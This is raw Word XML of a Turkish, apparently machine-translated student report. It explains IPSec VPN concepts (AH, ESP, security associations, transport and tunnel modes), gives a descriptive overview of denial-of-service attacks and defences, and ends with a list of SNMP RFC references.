        <w:t>1.1 Tarihç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1994 yılında, İnternet Mimarisi Kurulu (IAB) “İnternet Mimarisinde Güvenlik” üzerine bir rapor yayınlad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orum İsteği [RFC] 1636). Rapor, İnternet’in daha fazla ihtiyaç duyduğu genel görüş birliğini belirtt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ve TCP / IP protokol paketindeki doğal güvenlik zayıflıkları nedeniyle daha iyi güvenlik v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üvenlik iyileştirmeleri için kilit alanlar. IAB ayrıca aynı güvenlik işlevlerinin b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P protokolünün gelecek neslin ayrılmaz bir parçası olan IPv6. Yani, baştan beri, bu gelişen standart</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ürekli gelecek nesil IP ve ağ iletişimi teknolojisi ile uyumlu olacak.</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VPN çocukluğuna 1995 yılında, kar amacı gütmeyen bir dernek olan AIAG (Otomotiv Endüstrisi Eylem Grubu) ile başlamışt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Kuzey Amerika araç üreticileri ve tedarikçileri ile ANX (Otomotiv Ağ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eXchange) projesi. Proje, alım satımdan oluşan bir TCP / IP ağına duyulan ihtiyacı karşılamak için üretild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ortaklar, sertifikalı servis sağlayıcılar ve şebeke değişim noktaları. Gereksinim verimli v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üvenli olmayan kanallar üzerinden yalnızca tek bir bağlantıyla aboneler arasında elektronik iletişimin güvenliğini sağlamak.</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u teknoloji büyüdükçe, güvenli sağlamak isteyen herhangi bir kuruluş için bir çözüm olarak kabul edild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ortaklar, müşteriler veya herhangi bir uzak ağla iletişim kurmak. Ancak, büyüme ve kabul</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tandartlar ve ürün destek konularının bulunmamasına engel oldu.</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2 Standardın Yapı Taşlar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PSec standardı, IP katmanında gizlilik ve kimlik doğrulama hizmetleri sağlamak için kullanılır. Birkaç RFC</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u protokol paketini tanımlamak için kullanılır. Belgelerin karşılıklı ilişkisi ve organizasyonu önemlid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enel standardın geliştirme sürecinin farkında olmak.</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ergi 32.1'in gösterdiği gibi, ayrı yönlerin birleştirilmesine izin veren yedi belge grubu vard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şleyen bir ilişki elde edilirken IPSec protokol paketinin bağımsız olarak geliştirilmes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önetilen.</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lastRenderedPageBreak/>
        <w:br/>
        <w:t>Mimari, genel teknoloji kavramlarını ve güvenliğini kapsayan ana açıklama belgesidir. hususlar. IPSec protokol paketinin ilk anlaşılması için erişim noktası sağlar. ESP (Kapsüllenen Güvenlik Yükü) protokolü (RFC 2406) ve AH (Kimlik Doğrulama Başlığı) protokolü (RFC 2402) belge grupları, paket biçimlerini ve paket yapısı için varsayılan standartları uygulama algoritmaları içerir. Şifreleme Algoritması belgeleri, çeşitli şifreleme kullanımını ayrıntılandıran bir dizi belgedir. ESP için kullanılan teknikler. Belge örnekleri arasında DES (Veri Şifreleme Standardı RFC 1829) bulunmaktadır. ve Triple DES (taslak-simpson-desx-02) algoritmaları ve verilerin şifrelemesindeki uygulamaları.</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Kimlik Doğrulama Algoritmaları, kullanılan süreç ve teknolojileri tanımlayan bir grup belgedir. AH ve ESP protokolleri için bir kimlik doğrulama mekanizması sağlar. Örnekler HMAC-MD5 (RFC) olacaktır. 2403) ve HMAC-SHA-1 (RFC 2404). Bu belgelerin tümü DOI'ye uyumluluk için birleştirilmesi ve tanımlanması gereken değerleri belirtir, veya Yorumun Yapıldığı Alan (RFC 2407). DOI belgesi IANA tarafından atanan numaralar mekanizmasının bir parçasıdır ve birçok standart için sabittir. Diğer belgelerin değerleri için merkezi depo sağlar. birbirleriyle ilgilidir. DOI, protokolün diğer bölümleri için gereken parametreleri içerir. tanımların tutarlı olduğundan emin olun.</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3 Fonksiyonun tanıtımı</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H bütünlük, kimlik doğrulama, dizi bütünlüğü (tekrarlama direnci) ve reddetme için tasarlanmışt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 ancak ESP'nin tasarlandığı gizlilik için değil. Kullanımın çeşitli uygulamalar vard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adece bir AH gereklidir veya şart koşar. Gizliliğin gerekli olmadığı veya onaylanmadığı uygulamalard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devletin şifreleme kısıtlamaları ile, kendi içinde olabilen bir bütünlük sağlamak için bir AH kullanılabil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Potansiyel saldırganlara karşı güçlü bir düşman. Bu tür bir uygulama bilgileri</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ayma ancak bilgilerin bütünlüğünün doğrulanmasına ve</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aratıcısı.</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IP başlığının geri kalanı AH güvenlik protokolü ile doğrulamada kullanılmaz. ESP kimlik doğrulaması bundan önce gelen hiçbir IP başlığını kapsamaz. ESP protokolü, AH’nin bazı servislerinin yanı sıra şifreleme de sağlar. Bu iki protokol yapabilir Belirli bir uygulama veya çevresel yapı için gereken servis seviyesini elde etmek için ayrı olarak kullanılabilir veya kombine edilebilir. ESP kimlik doğrulama özellikleri, dahil edilmemesi nedeniyle AH ile karşılaştırıldığında sınırlıdır. kimlik doğrulama işleminde IP başlık bilgisinin. Bununla birlikte, ESP, yalnızca üst katman protokollerinin kimliğinin doğrulanması gerekiyor. Kimlik doğrulama için sadece ESP'nin uygulanması, bütünlük ve üst katmanlara gizlilik, ESP’nin AH. Kimlik doğrulama ve gizlilik her ikisi de isteğe bağlı işlem olsa da, güvenlik protokollerinden biri uygulanmalı. Sadece kimlik doğrulama ile ve şifreleme veya boş şifreleme olmadan iletişim kurmak mümkündür (RFC 2410). ESP'nin ek bir özelliği de büyüklüğü gizleyen yük dolgusu iletilen paketin ve ayrıca iletişimin özelliklerini korur. Bu protokollerin onaylanması süreci, bir güvenlik derneği (SA) oluşturmak için gereklidir. bir IPSec VPN Bir SA, AH veya ESP protokolü tarafından sağlanan kimlik doğrulamasından oluşturulur ve SA'nın sistemler arasında kurulması ve sürdürülmesi için anahtar yönetiminin temel işlevi. SA bir kez Elde edilen verilerin taşınması başlayabili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lastRenderedPageBreak/>
        <w:t>1.4 Vakfı Anlamak</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Güvenlik birlikleri IPSec'in altyapısıdır. IPSec protokol paketinin tüm bölümleri arasında SA satıcı entegrasyonu ve heterojen sanal özel ağların gerçekleştirilmesi için odak noktası. SA Tüm IPSec uygulamaları arasında ortaktır ve IPSec uyumlu olması için desteklenmesi gerekir. Bir SA neredeyse VPN ile eşanlamlı ancak “VPN” terimi çok daha gevşek bir şekilde kullanılıyor. SA'lar başka güvenliklerde de var protokolleri. Daha sonra açıklandığı gibi, IPSec VPN'lerde kullanılan anahtar yönetimin çoğu, Anahtar yönetiminin diğer formları desteklemesine izin veren, temel güvenlik protokolünü tanımlayan özellikler SA kullanan VPN teknolojisi.</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Bir SPI, aynı hedefe son veren farklı SA'lar arasında ayrım yapmak için kullanılan 32-bit bir değerdir ve aynı IPSec protokolünü kullanarak. Bu veri SA'ların tek bir ağ geçidine çoklanmasına izin verir. İlginçtir, hedef IP adresi tek noktaya yayın, çok noktaya yayın veya yayın olabilir; ancak, SA'ların yönetimi için standart şu anda tek noktaya yayın uygulamaları veya noktadan noktaya SA'lar için geçerlidir. Pek çok satıcı, başarılı olmak için birkaç SA kullanacak noktadan çok noktaya bir ortam. Son kimlik - güvenlik protokolü tanımlayıcısı - bunun için kullanılan güvenlik protokolüdür SA. Tek bir SA tarafından sağlanan iletişim için yalnızca bir güvenlik protokolünün kullanılabileceğini unutmayın. Etkinlikte AH ve ESP güvenliğinin her ikisini de kullanarak iletişimin kimlik doğrulama ve gizlilik gerektirdiğini protokoller, iki veya daha fazla SA'nın oluşturulması ve trafik akışına eklenmesi gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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5 İletişim Modları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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br/>
        <w:t>IPSec bağlantısı için işlem türü, sistemin VPN'de oynadığı rolle doğrudan ilgilidir veya SA durumu. IPSec VPN'ler için Ek 32.2'de gösterildiği gibi iki çalışma modu vardır: Aktarım modu ve tünel modu.</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ktarım modu, üst katman protokollerini korumak için kullanılır ve yalnızca IP paketindeki verileri etkiler. Daha fazl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dramatik yöntem, tünel modu, güvenli bir iletişim kurmak için tüm IP paketini içine alı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iletişim.</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ktarım modu, uç nokta bir ana bilgisayar olduğunda veya iletişim</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itiş noktaları. Ağ geçidi-ana bilgisayar iletişimindeki ağ geçidi taşıma modunu kullanıyors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u ağ geçidine doğrudan protokoller için kabul edilebilir olan konak sistemi. Aksi takdirde, tünel modu gereklid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ğ geçidi servislerinin dahili sistemlere erişim sağlaması için.</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5.1 Taşıma modu</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br/>
        <w:t xml:space="preserve">Aktarım modunda IP paketi, orijinal IP'den sonra bulunan güvenlik protokolünü (AH veya ESP) içerir. başlık ve seçenekler ve pakette bulunan TCP ve UDP gibi herhangi bir üst katman protokolünden önce. Ne zaman ESP güvenlik protokolü için kullanılır, koruma veya karma yalnızca üst katman protokollerine uygulanır. paketin içinde bulunur. IP başlık bilgisi </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ve seçenekleri, kimlik doğrulama işleminde kullanılmaz. Bu nedenle, kaynak IP adresi verilere karşı bütünlük açısından doğrulanamaz. AH kullanımı ile güvenlik protokolü, koruma, bütünün bütünlüğünü sağlamak için IP başlığına ilerletilir. karma işleminde orijinal IP başlığının kısımlarını kullanarak paketleyin.</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5.2 Tünel Modu</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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Tünel modu ağ geçidi servisleri için kuruludur ve temelde kimlik doğrulaması olan bir IP tüneli ve şifreleme. Bu en yaygın çalışma şeklidir. Ağ geçidinden ağ geçidine tünel modu gereklidir ve host-to-gateway iletişimi. Tünel modu iletişiminde iki grup IP başlığı bulunur - içeride ve dışarıda.</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br/>
        <w:t>IP üstbilgisinin TTL’si (Canlı Kullanım Süresi), kapsülleme sistemi tarafından bir Ağ geçidinden geçerken sekme sayımı. Ancak, ağ geçidi kapsülleme sistemi ise, NAT olduğu gibi iç ana bilgisayarlar için uygulanır, iç IP başlığı değiştirilmez. TTL'nin değiştirilmesi durumunda, sağlama toplamı IPSec tarafından yeniden yaratılmalı ve değişikliği yansıtacak şekilde IP'yi koruyarak orijinalin yerine kullanılmalıdır paket bütünlüğü. Dış IP başlığının oluşturulması sırasında, iç başlığın girişlerinin ve seçeneklerinin çoğu eşleştirilir dışarıya. Bunlardan biri şu anda IPv4'te bulunan ToS (Hizmet Türü).</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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1.6 Verileri Koruma ve Doğrulama</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H ve ESP protokolleri veriler için kimlik doğrulama veya bütünlük sağlayabilir ve ESP sağlayabil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veri için şifreleme desteği. Güvenlik protokolünün başlığı, cihazınız için gerekli bilgileri içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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eraberindeki paket. Sergi 32.3, her başlığın biçimini gösteri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7 Bağlantıları Yönetme</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br/>
        <w:t>Daha önce de belirtildiği gibi, SA'lar IPSec protokol paketinin temel amacını ve ağ geçitleri ve ana bilgisayarlar. Birkaç uygulama ve standart katmanı kontrol etmek, yönetmek, ve SA'ların izlenmesi. Çeşitli uygulamalar, servislerin birleştirilmesini gerektirebilir; gerekli taşıma. Örnek olarak, kimlik doğrulama ve gizlilik gerektiren bir uygulama olabilir. AH ve ESP'yi kullanmak ve daha fazla SA grubunun hiyerarşik iletişim sağlamasını gerektirir. Bu süreç iletişimin katmanlı bir etkisini sağlayabilen bir SA Paketi olarak adlandırılır. SA paketlerinden yararlanılabilir iki formatta uygulamalar: ince tanecik ve kaba tanecik. İnce ayrıntı düzeyi, her iletişim süreci için SA'ların atanmasıdır. Tek bir üzerinden iletilen veriler SA tek bir güvenlik protokolü ile korunmaktadır. Veriler, bir AH veya ESP tarafından korunur, ancak her ikisi de SA'lar nedeniyle korunmaz sadece bir güvenlik protokolüne sahip olabil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8 Çok Katmanlı Güvenlik Akışı Sağlama</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br/>
        <w:t xml:space="preserve">Ayrıcalık sağlamak için çok katmanlı güvenlik (MLS) veya veri etiketlemesi yapan birçok sistem vardır. ağ üzerinde iken verebileceği sistem ve verilere dayalı güvenlik. Bu operasyon modeli Zorunlu Erişim Kontrolü (MAC) olarak adlandırılabilir. Bu güvenlik modelinin bir örneği Bell-LaPadula'dır. Hassas bilgilerin izinsiz iletilmesine karşı koruma sağlamak için tasarlanmış bir modeldir. Çünkü veri Transit olarak incelenmek üzere kendisi etiketlendi, çeşitli güvenlik katmanları uygulanabilir. Diğer güvenlik biçimleri erişim denetim listelerini veya filtreleri kullanabilecek İsteğe Bağlı Erişim Kontrolü (DAC) gibi modeller çok katmanlı </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>güvenliği desteklemek için yeterli. AH ve ESP gerekli güvenliği sağlamak için birleştirilebilir MAC ortamında çalışan MLS sistemleri için gerekli olabilecek politika.</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br/>
        <w:t>Bu, güvenliği bağlamak için AH güvenlik protokolünün kimliği doğrulayan özellikleri kullanılarak gerçekleştirilir Orijinal IP başlığındaki yüklerin yük ile eşleştirilmesi. AH’nin bu şekilde kullanılması, Başlığa karşı veri. Şu anda, IPv4 yükü başlık ile doğrulamıyor. Duyarlılığı veri sadece başlığın varsayılanı olarak kabul edilir. Bu işlemi gerçekleştirmek için, her SA veya SA Paketi, diğer güvenlik seviyelerinden ayırt edilebilir olmalıdır. bilgi iletiliyor. Örnek: “SENSITIVE” etiketli veriler SA veya SA ile eşlenecek Paket, “SINIFLANDIRILMIŞ” etiketli veriler başkalarına eşlenecek. SAD ve SPD bir parametre içerir Verilerin elde edilmesini sağlamak için çeşitli uygulamalar tarafından erişilebilen Hassasiyet Bilgisi olarak adlandırılır. Aktarılan uygun şifreleme seviyesi ve ilgili SA'lara iletil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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:jc w:val="center"/>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Denial-of-Service Attack</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1 Gözyaşı Saldırısı Ned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Denial of Service (DoS saldırısı) olarak da bilinir. İnternete bağlı bir hostun hizmetlerini geçici veya süresiz olarak aksatarak, bir makinenin veya ağ kaynaklarının asıl kullanıcılar tarafından ulaşılamamasını hedefleyen bir siber saldırıdı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DoS genellikle hedef makine veya kaynağın, gereksiz talepler ile aşırı yüklenmesi ve bazı ya da bütün meşru taleplere doluluktan kaynaklı engel olunması şeklinde gerçekleştirilir. DoS saldırısını; bir grup insanın, bir dükkân veya işyerindeki kapıları tıkayıp, meşru tarafların mağazaya veya işletmeye girmesine izin vermeyerek normal işlemleri aksatması şeklinde örnekleyebiliriz.</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2 Gelişmiş Kalıcı DoS</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Gelişmiş Kalıcı DoS(APDoS), gelişmiş bir kalıcı tehdit(APT) tarafından işgal edilme olasılığı yüksektir. Gelişmiş kalıcı tehdit iyi kaynaklara sahip, son derece yetenekli ve önemli derecede ticari nitelikli bilgisayar kaynakları ve kapasitesine erişen aktörlerdir. APDoS saldırıları özel izleme ve olay tepki hizmetlerine ve özel DDoS azaltma servis sağlayıcılarının savunma yeteneklerine ihtiyaç duyan açık ve yeni bir tehdit oluşturu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u saldırı türü uygulama katmanı(HTTP) floodlarına kadar geniş ağ katmanlı DDoS saldırılını ve (değişken aralıklarla) SQL'i ve XSS saldırılarını içerir. Suçlular genellikle saniyede on milyondan fazla talep içeren 2 den 5'e kadar saldırı vektörünü eş zamanlı kullanabilirler.Bu saldırıların çoğu kurbana saldırmakla kalmaz, aynı zamanda herhangi bir DDoS azaltma yönetimi sağlayan herhangi bir servis sağlayıcıya SYN flood'ları eşlik eder. Bu saldırılar birkaç hafta devam edebilir. Şu ana kadarki en uzun süre 38 gün sürmüştür. Bu APDoS saldırıları yaklaşık 50+ petabits (50,000+ terabits) zararlı trafik içeriyordu.</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aldırganlar bu senaryoda(çoğu kez) taktiksel olarak birçok hedef arasında geçiş yapar.Bunu DDoS defanslarından kurtulmak için oluşturmuştur. Ancak tüm bunlar sonunda saldırının ana gücünü tek bir kurban üzerinde yoğunlaştırdı.</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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1.3 Servis Olarak DoS</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azı satıcılar basit web tabanlı ön uçlara sahip olan ve web üzerinden ödeme kabul eden "booter" veya "stresser" hizmetleri sunar. Stres test araçları olarak satılır ve geliştirilirler. Yetkisiz DoS saldırıları yapılmasına ve teknik olarak ileri düzeyde bilgisi olmayan saldırganların, gelişmiş saldırı araçlarına saldırganın kullanımını anlamasına gerek kalmadan erişmesine olanak sağla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 Korunma Yolları</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lastRenderedPageBreak/>
        <w:t>DoS saldırılarına karşı savunmalar, genellikle, saldırı tespiti, trafik sınıflandırması ve yanıt araçları kombinasyonunun kullanılmasını içerir. Bunlar, meşru olduklarını belirledikleri trafik akışına izin vermeyi ve diğer trafikleri engellemeyi  amaçla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1 Uygulama Ön Uç Donanımı</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Uygulama ön uç donanımı, trafik sunucularına ulaşmadan önce ağa yerleştirilen akıllı bir donanımdır. Anahtarlar ve yönlendiriciler ile birlikte ağlarda kullanılabilir. Uygulama ön uç donanımı sisteme girerken veri paketlerini analiz eder ve sonra bunları öncelikli, normal veya tehlikeli olarak tanımlar. 25'den fazla bant genişliği yönetimi sağlayıcısı bulunmaktadı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2 Kara Delik ve Sinkholing</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Kara Delik yönlendirmesiyle, saldırıya uğramış DNS veya Ip adresine bir "kara delik"'e(boş arayüz veya mevcut olmayan bir sunucuya) tüm trafik yollanır.Daha verimli olmak ve ağ bağlantısını etkilemekten kaçınmak için, ISS tarafından yönetilebil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ir DNS sinkhole trafiği analiz eden ve hatalı paketleri reddeden geçerli bir IP adresine yönlendirilir.Sinkholing, en güçlü saldırılar için etkili değild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3 IPS Tabanlı Savunma</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Saldırı önleme sistemleri (IPS), saldırıların kendileri ile ilişkili imzaları olması durumunda etkilidir. Fakat, saldırılar arasındaki eğilim meşru içeriğe sahip olmakla birlikte kötü niyetlidir. İçerik tanıma üzerinde çalışılan saldırı önleme sistemleri davranış temelli DoS saldırılarını engelleyemez.</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4 Güvenlik Duvarları</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Basit bir saldırı durumunda, güvenlik duvarları saldırganlardan gelen tüm trafiği, protokollere, portlara veya kaynak IP adreslerine dayanarak reddetmek için basit bir kurala sahip olabili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Ancak basit kurallarla daha karmaşık saldırıların engellenmesi zor olacaktır. Örneğin, 80. portta(web hizmeti) devam eden bir saldırı varsa, bu porta gelen bütün trafiği engellemek mümkün değildir, çünkü meşru trafikleri de engellemiş oluruz.</w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidRPr="005C7B52">
          <w:rPr>
            <w:rStyle w:val="tlid-translation"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>[44]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t> Ayrıca, ağ hiyerarşisinde güvenlik duvarları çok derinde olabilir, bu yüzden trafik güvenlik duvarına gelmeden önce yönlendiriciler olumsuz etkilenmiş olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1.4.5 Yönlendiriciler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Yönlendiriciler de , anahtarlar gibi bazı hız sınırlayıcı ve ACL özelliklerine sahiptir.Yönlendiriciler de el ile ayarlanır. Çoğu yönlendirici , bir hizmet reddi saldırısı altında kolayca ezilebilir. Cisco IOS , isteğe bağlı olarak floodların etkisini azaltabilen özelliklere sahiptir.</w:t>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REFERANSLAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="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İnternet Mühendisliği Görev Gücü (IETF) Yorum İsteği (RFC) belgeleri: İnternet Mühendisliği Görev Gücü (IETF) Yorum İsteği (RFC) belgeleri:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="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089 SNMP over Ethernet </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="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157 SNMP over Ethernet </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="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187 Bulk Table Retrieval with the SNMP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215 Convention for Deﬁning Traps for Use with the SNMP RFC-1227 SNMP MUX Protocol and MIB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228 SNMP-DPI: Simple Network Management Protocol Distributed Program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270 SNMP Communications Service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03 A Convention for Describing SNMP-Based Agent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51 SNMP Administrative Model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52 SNMP Security Protocol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53 Deﬁnitions of Managed Objects for Administration of SNMP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81 SNMP MIB Extension for X.25 LAPB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382 SNMP MIB Extension for the X.25 Packet Layer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418 SNMP over OSI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419 SNMP over AppleTalk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420 SNMP over IPX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461 SNMP MIB Extension for Multiprotocol Interconnect over X.25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503 Algorithms for Automating Administration in SNMPv2 Manager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901 Introduction to Community-Based SNMPv2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909 An Administrative Infrastructure for SNMPv2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1910 User-Based Security Model for SNMPv2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011 SNMPv2 Management Information Base for the Internet Protocol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012 SNMPv2 Management Information Base for the Transmission Control Protocol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013 SNMPv2 Management Information Base for the User Datagram Protocol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089 V2ToV1 Mapping SNMPv2 onto SNMPv1 within a Bi-Lingual SNMP Agent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RFC-2273 SNMPv3 Applications</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571 An Architecture for Describing SNMP Management Framework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573 SNMP Application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742 Deﬁnitions of Managed Objects for Extensible SNMP Agents </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RFC-2962 An SNMP Application-Level Gateway for Payload Address </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CERT Advisory CA-2002–03</w:t>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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
